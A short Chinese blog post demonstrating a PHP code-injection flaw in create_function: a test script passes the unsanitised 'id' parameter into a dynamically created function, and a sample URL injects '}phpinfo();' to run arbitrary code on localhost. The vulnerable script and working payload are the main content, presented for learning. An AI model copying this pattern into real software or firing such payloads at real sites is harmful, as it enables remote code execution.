美文网首页
create_function函数注入漏洞

create_function函数注入漏洞

作者: 草莓养殖户 | 来源:发表于2020-04-10 09:23 被阅读0次

测试代码:

<?php

//02-8.php?id=2;}phpinfo();/*

$id=$_GET['id'];

$str2='echo  '.$a.'test'.$id.";";

echo $str2;

echo "<br/>";

echo "==============================";

echo "<br/>";

$f1 = create_function('$a',$str2);

echo "<br/>";

echo "==============================";

?>

攻击方式:

http://127.0.0.1/test.php?id=2;}phpinfo();%23 (这个也可以,图中也可以,道理都是一样的)

相关文章

网友评论

      本文标题:create_function函数注入漏洞

      本文链接:https://www.haomeiwen.com/subject/vrbrgctx.html